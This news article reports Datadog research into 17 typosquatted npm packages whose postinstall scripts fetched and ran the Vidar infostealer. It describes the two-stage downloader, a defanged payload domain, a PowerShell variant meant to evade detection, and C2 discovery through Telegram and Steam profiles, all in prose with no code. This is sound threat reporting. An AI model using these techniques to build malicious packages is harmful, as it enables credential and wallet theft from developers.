Vidar Infostealer Hits npm for the First Time via 17 Typosquatted Packages and Postinstall Scripts

Researchers at Datadog Security Research have uncovered a major supply-chain compromise in the npm ecosystem involving 17 malicious packages (across 23 releases) that secretly installed Vidar infostealer malware on Windows systems. The campaign, attributed to a threat activity cluster tracked as MUT-4831, marks the first known instance of Vidar being distributed via npm packages.

The threat actors behind MUT-4831 employed classic social engineering tactics, creating packages that appeared functional and legitimate. These malicious libraries were published by two recently created npm accounts, aartje and saliii229911, and remained active on the registry for approximately two weeks.

The packages deceptively posed as:

• Telegram bot helper packages.
• Icon libraries.
• Forks of established projects like Cursor and React.

One representative package, custom-tg-bot-plan, presented itself as a “Node.js Telegram Bot API – Custom Fork”. At the time of detection, the packages had been downloaded at least 2,240 times.

The malicious packages leveraged an exceedingly common vector: the postinstall script. Datadog’s static analyzer, GuardDog, flagged the presence of npm-install-script, indicating that a script was automatically running upon installation.

The attack chain, typical of a two-stage malware deployment, is executed by the dependencies.js script:

1. Download: The script downloads an encrypted ZIP archive from a hardcoded URL on the bullethost[.]cloud domain.
2. Unpack: It then decrypts and extracts the archive using a hardcoded password.
3. Execute: Finally, it executes a PE binary named bridle.exe from the extracted archive.

“This downloader pattern is one we observe routinely among malicious npm packages, in which a slim first-stage malware that ships with the package loads a second, more overtly malicious stage.”

In a variation, a small number of packages used an embedded PowerShell script in the package.json to handle the download step, possibly “diversifying implementations… in terms of surviving detection.”

The second stage, the executable bridle.exe, was identified as a known variant of the Vidar infostealer malware. Vidar is designed to harvest a wide array of sensitive information from Windows systems:

• Browser credentials and cookies.
• Cryptocurrency wallets.
• System files.

This particular Vidar v2 variant, compiled from Go, uses an unusual technique for Command-and-Control (C2) infrastructure discovery. It calls home to hardcoded Telegram and Steam profiles, where the C2 domains are rotated and advertised in the accounts’ usernames and descriptions.

Upon successful data theft, Vidar packages the stolen information and exfiltrates it before deleting all traces of itself from the victim system.

This campaign is a potent reminder that “Threat actors have learned that npm provides a reliable initial access vector for delivering malware to unsuspecting downstream victims.”

The npm accounts associated with the campaign (aartje and saliii229911) have since been banned, and all malicious packages have been removed and replaced with security holding packages.

Related Posts:

• npm Typosquat Campaign: 10 Malicious Packages Deliver PyInstaller Infostealer via Fake CAPTCHA
• Beware of Fake KMSPico Activators: A Gateway for Vidar Stealer Malware
• Major Threat: Vidar Stealer v2.0 Bypasses Chrome AppBound Encryption with Multithreaded Memory Injection
• Vidar Stealer Hides in Legitimate BGInfo Tool
• AI-Generated Malware: TikTok Videos Push Infostealers with PowerShell Commands